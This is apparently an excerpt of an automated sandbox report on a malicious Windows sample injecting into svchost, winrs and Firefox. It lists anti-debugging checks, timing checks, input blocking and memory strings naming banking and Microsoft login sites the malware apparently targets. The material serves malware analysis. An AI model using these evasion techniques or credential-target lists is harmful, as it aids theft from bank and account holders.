Source: C:\Windows\SysWOW64\winrs.exe	Code function: 4_2_02C5C3A0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02C5C3A0

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_00FFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00FFDDC0

Source: -4EF4J77B.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: -4EF4J77B.4.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: -4EF4J77B.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: -4EF4J77B.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: -4EF4J77B.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: -4EF4J77B.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: ohrkzzHWPesnQB.exe, 00000006.00000002.3877986070.000000000110F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
Source: -4EF4J77B.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: -4EF4J77B.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: -4EF4J77B.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: -4EF4J77B.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: -4EF4J77B.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: -4EF4J77B.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: winrs.exe, 00000004.00000002.3877333853.0000000002E96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -4EF4J77B.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: firefox.exe, 00000007.00000002.2423276640.000001760942C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
Source: -4EF4J77B.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: -4EF4J77B.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: -4EF4J77B.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: -4EF4J77B.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: -4EF4J77B.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: -4EF4J77B.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: -4EF4J77B.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: -4EF4J77B.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: -4EF4J77B.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: -4EF4J77B.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\A2028041200SD.exe	API call chain: ExitProcess graph end node			graph_0-95321
Source: C:\Users\user\Desktop\A2028041200SD.exe	API call chain: ExitProcess graph end node			graph_0-95996

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\winrs.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0347096E rdtsc

2_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417543 LdrLoadDll,

2_2_00417543

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01036AAF BlockInput,

0_2_01036AAF

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_00FE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00FE3D19

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_01013920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_01013920

Source: C:\Users\user\Desktop\A2028041200SD.exe

Code function: 0_2_00FFE01E LoadLibraryA,GetProcAddress,

0_2_00FFE01E

Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00A85810 mov eax, dword ptr fs:[00000030h]	0_2_00A85810
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00A86E80 mov eax, dword ptr fs:[00000030h]	0_2_00A86E80
Source: C:\Users\user\Desktop\A2028041200SD.exe	Code function: 0_2_00A86EE0 mov eax, dword ptr fs:[00000030h]	0_2_00A86EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]	2_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]	2_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]	2_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]	2_2_0350634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]	2_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]	2_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]	2_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]	2_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]	2_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]	2_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]	2_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]	2_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]	2_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]	2_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]	2_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]	2_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]	2_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]	2_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]	2_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]	2_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]	2_2_0350625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]	2_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]	2_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]	2_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]	2_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]	2_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]	2_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]	2_2_035062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]	2_2_034402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]	2_2_0346E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]	2_2_034B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]	2_2_034402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]	2_2_034C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]	2_2_034C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]	2_2_0342C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]	2_2_03436154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]	2_2_03504164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]	2_2_034DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]	2_2_034F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]	2_2_03460124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]	2_2_034F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_034AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]	2_2_035061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]	2_2_034601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]	2_2_03470185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]	2_2_034EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]	2_2_034D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]	2_2_034B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]	2_2_0342A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]	2_2_03432050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]	2_2_034B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]	2_2_0345C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]	2_2_034B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]	2_2_0344E016
